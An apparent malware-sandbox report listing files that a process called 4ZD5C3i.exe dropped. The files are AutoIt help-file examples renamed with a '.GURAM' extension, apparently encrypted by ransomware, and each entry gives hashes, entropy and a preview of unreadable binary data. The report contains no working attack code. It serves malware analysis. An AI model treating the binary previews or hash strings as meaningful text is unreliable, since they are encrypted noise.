                                                                                                                                                                                                                                                SHA-512:D0B6469183DB7BFEF807A538C59D30ABAA9C61653C9D68676DA33BD2B58C2C276E9FDC0F0C5E296A16275A96F933D9FDC0B0B9E8A8724E22811013563BAF7BA3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.p..|"N.:4.m.....Ai).C..j.5.)h.[.bE.....s...o*.+..(F....q.}42GN.Fg.:......7.".|.Wi.J4.**..!U..Wq5...+.+p.W.p.QO.u8).....=......%.1S.c......F.\J3H.f\.[..qt$.4R....%WJo.......YC...J...b.t.o.-J.zC..1m..I....+..Y|.T...g.#.c..Kg.*:3.G...s.A.Py....G.s.}l..L.../1."..d....H!....o$....U.....-./..._P.....H#A..k..... 8..a..........R&..].".QW.......`].<.|..L....w.wC..3U__..z.....u..'.v.;...GOz|.H.%.v.....K.u..8...m|.`..g....R.F.>R8.d....M....B_f..$t........s.....94C.oS..m_....Shf3H.9a,G....q....~...]..w...oA....gb}q...~.~.W...u.;...'(?.|_,...mQ-........+0.-....*.AOm.Y.y.].H..P....D.......?.X.<z.).}.d..V.V0A .._....:r3...3.....5.0...Z.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;.

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\ASin[2].au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):814
                                                                                                                                                                                                                                                Entropy (8bit):7.720540014450463
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:ovNsrt+Oj9+BB6d74jaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZQW:btFQUyjmJrc0YXUZtwsTzh
                                                                                                                                                                                                                                                MD5:12FEB611E5CDCED1A8E9901EF230A1D1
                                                                                                                                                                                                                                                SHA1:94234E95F7B4ABD5366EC27E399ADA9396C7DDC8
                                                                                                                                                                                                                                                SHA-256:F8F2127F6D212846396A22F24247882610263552F83CDD02493B87B24E8E8A03
                                                                                                                                                                                                                                                SHA-512:F34552942B5D15AB2B99BDC993A48324A1C8CA8080BB5F09972A9F040A1BC1B95EF045FC184CA513480ABA48B295F1ACCDF284C263464E120C3D9706073EBEF5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..P....3...F.hcE..r..Yz..a.!.#..^..C*....C0.....7=.AG.......K.:.H..|A.P#N.&P.4...Z..I.....G....U..D.QV......R./o....KH....(......mS.J......U..3...%8i....r.....%]P...H...5.B..z...\...5-.....&....\8.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.p\......cU....k:.}^.r....|wk.m.qrr.l....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\ATan.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1263
                                                                                                                                                                                                                                                Entropy (8bit):7.843815645892645
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:mscDtVtJGSHtYCGBNWirMuONr0ljmJrc0YXUZtwsTKUa:m1PtYCGKiAuW0N4o0jZtw9
                                                                                                                                                                                                                                                MD5:38A0F7643DDEC17D6A3BC65322836441
                                                                                                                                                                                                                                                SHA1:8249AB9F9074FA8119036F29CE0761E6D949EEDB
                                                                                                                                                                                                                                                SHA-256:B2659E66FA6544492CACFB9EF89E5BA652F64215B67B703A7D086DDB1AC55CBD
                                                                                                                                                                                                                                                SHA-512:6D82D4E0342EF5491A837174345D364A5BD39D0706526C562DB4D6C699D541A387C586FBB4F3624D5F197E299CFE4CC3C113B6F8ED0648A6127DDBDADEAEB207
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:*...r..D....f#3~U..:J..~..k.....L....,$.m..n.0.D..kz..(..6.L5v..%"J:...3E..L...e.T.)...9.-...b.w3o.M.._.J.*..{(..4K.n)........;.$b.......a....m.W...{....h...s...u......0k9..E#...K.......j...H+.I.G......_....=~....*Z?...*.:.........w.....B.t.gk<d....}.+N...@z.6#.T9...gE.?uC._...m...Z..G...........l..zUI...$..H....Q...TL...q...|5.wY..%...W42.e.x..6..xD...o.......p..b.cX...o.lJ.F.}$0j'KJU.L8.......^*h.>8=......`.+!.*^..w#&^..<..<O..e^....So......'/.|...........1\2.G.i.8x.L{...2:..t#...G5...O.i~p..cC7t.0S..\.....P..O~X.cZ"l...1..p.a8..].l..8.~1T....-...*]s.:eu}..q...T....J.}.....2..n........._z....7.r)Dc|..1...u..]......>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'....

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\ATan[2].au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):810
                                                                                                                                                                                                                                                Entropy (8bit):7.732744481196617
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:IY9rAEI78AYTpw1o24rFrH252jaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXA:IY9kYOydW52jmJrc0YXUZtwsTvY
                                                                                                                                                                                                                                                MD5:B8445442F8E359E05E0E90A022CCFDAF
                                                                                                                                                                                                                                                SHA1:B78B0D48660560EB8CF73A4D0CCD94B23E8F077C
                                                                                                                                                                                                                                                SHA-256:EAA1EBACC3343FCF4AC32B6F17DBC9D4870C3DD6116261DF4A69F2F651B2AEAB
                                                                                                                                                                                                                                                SHA-512:1FB5A79302D9FC0FE3024D5D6C2B20F7678280C1242EF8840674555CFBF6A235E48E7BC82D5FCCB914F7EC8B9B38A9F4F4D267FA2055AA64BE447CA048F3D32F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..\...._(...p..+.2.!d..a.=v.....h.zV....@..u.l.;.a.).'.\X..a..>...<0 .Y..x/..<.Q.{.q...b.,..w.?.k..&.o...`.G.SmT.......'.+.0.Y."6..8..a...*Q....T..<J.~yflm..N.;...1_j,.-t.g..U..."......v..M.xL.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.k....U.cP..`.Ws'|n...FYkG2.CE+r.E.O....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\Abs.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):755
                                                                                                                                                                                                                                                Entropy (8bit):7.680384102009174
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:1UFTQd1Aho92jaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZofhm4ku:1UFs1Ah42jmJrc0YXUZtwsTE5
                                                                                                                                                                                                                                                MD5:C2BD90D21ED1C5FA077854D81F9ACBE9
                                                                                                                                                                                                                                                SHA1:7E060290AE23D42D4E95B323A88C175CF46E858C
                                                                                                                                                                                                                                                SHA-256:F5EC9050E00E11FD43ED1FBD90DE7DC1ECB8B650FA8D185C9C3ECC75D7540E00
                                                                                                                                                                                                                                                SHA-512:5D0FE188C6C6FAD2F83141F96EC08570EF2E4007EA64216A34C2BD7115A1D34F56F96F4C2D121C5E5F261746C675BDBED94003A6C4280049E12B050BCDD79631
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.u.....9=.-..@..|n..4.;..G.~..YO,3..;.@..D....P.M..^...9...H..6i*.....a.8-@D.#x...:...T.X.k....A.S...Bs.dU...3...|?.......!.?..Zf.".a..|.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.e.G~../$...&i.r....\.GB.<"3ZjDG...L....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\AdlibRegister.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1664
                                                                                                                                                                                                                                                Entropy (8bit):7.872443730454361
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:+3qhR777ts1K7ayNDDBPh8NyStOZ2xKPTch4fEWFjmJrc0YXUZtwsTuI:+3677ZPDdPeySqbEWt4o0jZtwVI
                                                                                                                                                                                                                                                MD5:F9E8E506A0970D0D011E0EA8FFFF5B12
                                                                                                                                                                                                                                                SHA1:DFCDDD1DE221258A5D5BAB4B3F7D6377CAFB51AD
                                                                                                                                                                                                                                                SHA-256:850CE6314BAFFB3C80BB4BE3A87F159E09B977660B5CD7173645D647A3218E66
                                                                                                                                                                                                                                                SHA-512:23E554353C00C45D8492B515CB6B1CD7FB8E5F0EA79F21ABCBCC309F9AB0D89CBBD87A80D9F910EC831989AF22B8FE1D2F066C0921E6CAF4CE8627AFF3332EB9
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:(....4.e....D..c.h..6.2..UY...nY.%...a.S..G.=f..P..5.W..C..5...0...[[qA@..........wbPf...@lU.Pz....@x.D.|O......r....3.V.....M..B..4..'.d+..~..0..s.......G......,.......X.S...k=....F>*i7.i..t..#....w5.4.i,..V.....b.;.r....y.'...c..'.e'.Z=......R..8..m..o.:..`i.O.L$`..T..I......B.$..<..Y9.._......&...1..'!.i..zs.a.....*.|p.Z.../.mZDqx..s.(O....^..mR.b.Y._....T?8...H.Qs...W..mnH.3..9......X.`B..w.. ...P.G".gczb...../40...A.8.q..Z..c....'.W..C.JU.U........u..^....'..+..`'..y...=...U5.$..:.o..P...c..^......F.d0Noq3.U3.k.=.ez=.!.H..q]..T.<......d....J_......8@...M5.rH... ...=T.O...=..@dw..Z.......o.'...a...F...m...."...W.A^....W...#........#.....4..].._.<(..h..M#..Tf..+k.vGX..G>.j..4g...h..~....xO...F .Sd.....?}.Nl...~f....q//M[..x".../...i`...F..1.i........._..K<...CQD6A.F... .{.\.......L.y~..u.I.. ..q..\..6...p$..Y.......9.3...t........_......^.......\..<V...|.^.c.!.<..Akg.C......9y.4z..@#.b......).!..C..'..nh{..it.....i.y...:..|.F....

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\Asc.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):727
                                                                                                                                                                                                                                                Entropy (8bit):7.69858877149246
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:S53DFjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZBBxku:S9FjmJrc0YXUZtwsTFBR
                                                                                                                                                                                                                                                MD5:16497348124F0F97BEA5424B8A9B7711
                                                                                                                                                                                                                                                SHA1:AE6F9139846C1A683A44DAF8A5DD2FF9DC5AD707
                                                                                                                                                                                                                                                SHA-256:6502471A2C8A1C7D89BDF29AA0918B5D98FCBD4EF78C9155E53E1151EB92183E
                                                                                                                                                                                                                                                SHA-512:71748CA016164A17D630D81CDEA9ABCA01D71E8F44DB440283CF91E358C2713132C61B17CA12B40B80EFF39ABC512A9B30C7C744CBDA3318CC0C00151EE1E689
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.EQV..o...}eL.../..DE\.V"0O#.n]|.FG.6I.z~.A$...Y.l.#.r..M{...:...j.....!...m....k.T...^n.@......F..I..O..Q....X..;.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..~...r......D.*~w..9........<@.).w...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\AscW.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):740
                                                                                                                                                                                                                                                Entropy (8bit):7.691350098277672
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:BXNpQAN2mjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZRJiku:BomjmJrc0YXUZtwsTu
                                                                                                                                                                                                                                                MD5:D6DFFBD313D3FE57D39F6B0267544FA9
                                                                                                                                                                                                                                                SHA1:4D3531D9AF689445E0D4A141506B4EA3A28959D8
                                                                                                                                                                                                                                                SHA-256:1AF3046553649A57BC5449D376D7AEE052D09ABD2DF5D97CED9585E9400CA09A
                                                                                                                                                                                                                                                SHA-512:A5956BF81CAD80C5C2EF39BE13340E56698533C0656DB615E0F66D4F1DD52B032163004869F7A26F4D48A57EF8498E690A79E71A3A79F3FEC47F62A12BFBE8B1
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...i0.....%!...p#Hd'.K....CqL.=..t..!......]...<.xX.G.....b.....iM@..b4.C..3U...T.v!...`...L.Dk!..l...S....&'8B.........o...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.....q-.n.j.p.<.T.x...[L..g)P.j........................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\Assign.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1030
                                                                                                                                                                                                                                                Entropy (8bit):7.767457376893201
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:yPuHmB2EUhUNYUGMHC6xXn1uiN6jaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDW:ymHw2EUhyntNsfjmJrc0YXUZtwsT40tf
                                                                                                                                                                                                                                                MD5:F042D3FD2A40FB912C186DC3882C24B2
                                                                                                                                                                                                                                                SHA1:7B52F50F5824059D3E6A49816861D21705523938
                                                                                                                                                                                                                                                SHA-256:5A90147F94EC568114DC3E69E0BC963B5417249F4B638E01E2EEF2C2C34DE544
                                                                                                                                                                                                                                                SHA-512:B9BF41DF10CF7176BED20A632BEE611EFDDABF28E761D5728FBD1ED82B602AC1E233BF0A6D1B7CC875ACC87B77401813C1A84A77D1894219B6DF0FAC6E078369
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:}.X.l..8.`W.3..I.;Y.=.F...q.[...M...B#.D....b/...c@.f...xJ....g\.......S`.....+O.*.F........~j..)1c..G...0....C#Wb.......Kj.`/.. ...x.|..}...V...'..;.E...klJ....n....do_....[.d..v.....d......$.Z.(.pu.%.....$....#k...F.m.`.S...L.._....St.^...&...o.r8..[....f...H<...P.......,.P8...c..... d."Ig.........w.a...>.[v2.?.h(...e.('.P..u.G...... #u.F....z....}&....5\.zp!..wN..-.F..}................f.W.98.0R..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$...Z0....\5....h2...b... ....X.{H..

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\AutoItSetOption.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2388
                                                                                                                                                                                                                                                Entropy (8bit):7.899826862262204
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:G9ggGe64hiRq1Pk4a0em7JhjLrXKZ9eSqQk524o0jZtwXVQZ:GDROqG/m7XjLDKZ9eSSLleXVI
                                                                                                                                                                                                                                                MD5:82E07E6F20E3BCB0ADB79691124518B4
                                                                                                                                                                                                                                                SHA1:C2798452ADCD0DEA800AFAFF625FCBD19C30240D
                                                                                                                                                                                                                                                SHA-256:128209B79D4AB26DEC63E99799515373EEBFFE3D695BD1B3D6F72580CCAE7904
                                                                                                                                                                                                                                                SHA-512:48BF4DB5F62E9A8B178C3A26671A0BEFF65626E89C0E6AFD8C40DC706106994EEA753645E0AAAC72B654CB8B88D7B94332602BAC6F3E569DF10B6CB82150F8CC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:L@.."e........*XvP>]......d.%......i.<........,..k..Z.g...ny.l..8!4.....y..b..<....H......W..3./.n.{...kU..Cr_i<.!........([U%.7.....C.>.....`.U..G....9.um.]B;.t=.....p7,B-..(}......P .B...](.;"-@.<.-...rS......O...b..F...O....8-.'..Z...).........)N.%.w.l..I..;l.....R.?......0......n.0.....yl...F.[....P..I......%.....sz..;.<#`!=...?..+."q\..:j.=..R.o'.q....x..O5..v].)~..u F.2....<7.....R.x./.n.....&F...bV....5{.kJ..(...Wj.@>...b.....".1i.u..I.x...)s*.3....m..U..3..Dz.......Yh..h.......xrl:....^|....~.\..W.F..=._..>...}........D+.9q.ai..C....m...#..;.X="...m.......]........@..L.q,H..l~.s...ir...x..W3.@...8.P.^K..Z+.._c....s.n'.gT#I....+.C'Z9O.7..f.6./.m....sML0....nf>`.l0...T..........Y..A.....`.nA....L-M.... ...+L.5u.\...P..V....+........H...5.,p}oy..v.4$E.'..R(...(......|...s.i.DA....^@....n..%.,..2&..n?..tL^......T..>..,X>..U...Rh...LF.....j.3....9....X.GK........,...v.#.c..|..a..w..Y.Y..^?.P..l.C.-....P...!...S.8.......n..Z

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\AutoItWinGetTitle.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1513
                                                                                                                                                                                                                                                Entropy (8bit):7.860984651615678
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:eOapds3Z9xJIc3eQjWHILM41CahYaOg4EKNxjmJrc0YXUZtwsTZa:eOapds3345HIpgaqzB4o0jZtwSa
                                                                                                                                                                                                                                                MD5:65E8FBB1E74AA51B75254F1A492900D9
                                                                                                                                                                                                                                                SHA1:53BD487308CCCF4CEF5641CE32CE1D9DD12A79BC
                                                                                                                                                                                                                                                SHA-256:F91B38567D98CB08D0A2354E30AB055713D891E7B1BB3B4871AC3BC36F92A2CD
                                                                                                                                                                                                                                                SHA-512:84E9C1D2363A8B622879CBA6BF76733711D96F7FDDE42CC76AFA6A3963EEAB35F00F7405FBF6709E99CEB5B0A885E52FEEE51FBBB5D755C508A02CB7027D15F0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..YW@...e!.9.Y.a...n.<.....T.8..%VR.e.e..v.B6.C.S..z.W.a./...K..y......P1..h..9...0yC..U.T_mY.....G...q&.M$.}...~..Y.{\.......8:I....._u{.o5F..8)..|.G.m#L.y..1....Q8.F....p2.3../..b...-..._......j...&.c.. T.+]...j)6...m..4.rG.....bM.........@v +.......c.....1..U..Z.1..u...E..n1.(...;#...lZG..S...%y....3...t#..G...2g..lx...F@N.........T..d/k..A..'.3..E..S..R,......=&.g..w<LhY...o..-WU.$..u.x(e....w.......])-N..`T.B+jFOg.^...{......p......~."_../.V#.:d......6.y.U..v!....\.V.....g.Qy.8L0..]N/V.......Rk.f.f..\.[I.@..V..zXr..ph...T....x.8..ow.T.XQ.e...A^.a}........l.U...u....S.e.'..l.-.......!i..@.6!B...(.oA...H...t.3....r~*..<..Ip...3z.V....I...C.$...V..~.7..j.n.\GS.p6.9%.Df.Ncy..!.(..667......r..p...;..6_......*.<{..........68.|....;.....e......_.....PY.~.KT....1.(....@..L..}....8#6Ki....F...-.....@...|?.u%...rB@$..4)R6..(+-.,_.?.3SV.H...S.. /.|...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8....

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\AutoItWinSetTitle.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1451
                                                                                                                                                                                                                                                Entropy (8bit):7.856409650790485
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:BJsSEsyhMxV+dkGjYqnIHaXHpNzESXrRxmOjmJrc0YXUZtwsTS+p:BJsSE/2HsHpNzjXbH4o0jZtwx+p
                                                                                                                                                                                                                                                MD5:DAD1CF18A7AACB72C69859A594C7C29C
                                                                                                                                                                                                                                                SHA1:4C5CBFCB6532D0C1FB9D94D34C11CAA22071AF14
                                                                                                                                                                                                                                                SHA-256:90ACF1C468B153DBEECF8E547F52200F57AC0B893C17486C3234D6B6A18AA606
                                                                                                                                                                                                                                                SHA-512:C57611D878A030A1D4D7280DFF1A66EF391ED68D2AB2BD7F21B2E4C010F93BD5589F27B55AE7F347DA321ADB44D6B6CF48893C35F2BC0ADB6B917D3412B2A457
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:......hS...@..x..z....< m...-`"..Li..k?...d..\q.bS`>..r.C[.4....]".h....b...n^.I..w./.N..........)......I ....A..}.<..+....8i....Yy.Z...&].[.={.........)g.?.2N.XS.....$@D.....]u..G...V.R....eiT...}..!...\Q..a]...........'.aHR0Z..K+mF....[.$...S.4,>.z..Y\.&N.C.=D....%..L..>....b........c....j$.d.n.:.2...?.C7.3..d..t'.;.......{K.3...I-.n..j.....Cj..n....(E...H...FW.pxh4(..%%K.U....F.N..........{l(..A.q..G.v.*6.:...P..<Db..Ad..0....|z....a.L....#?....:.k..),.D...;:)o.O8k..~.....K.=.n..d.!c..+..kPG......+....\{.....I..-&....sN....I.....<...._..|.u..e....!.&.G.....B..P.3....W ..LK..c...$.d....y....yg.I5.1R...J.t......!.6..$Z!...!`.O.ok...pG.%xIF......^.7Tjg..M..)Q%`............f.r.....R..g!....D....ZC+.g.^v1.$2..4i....U........d8\.............RX......:....xH)>....-_.H2..T...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.)...

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\AutoItWinSetTitle[2].au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
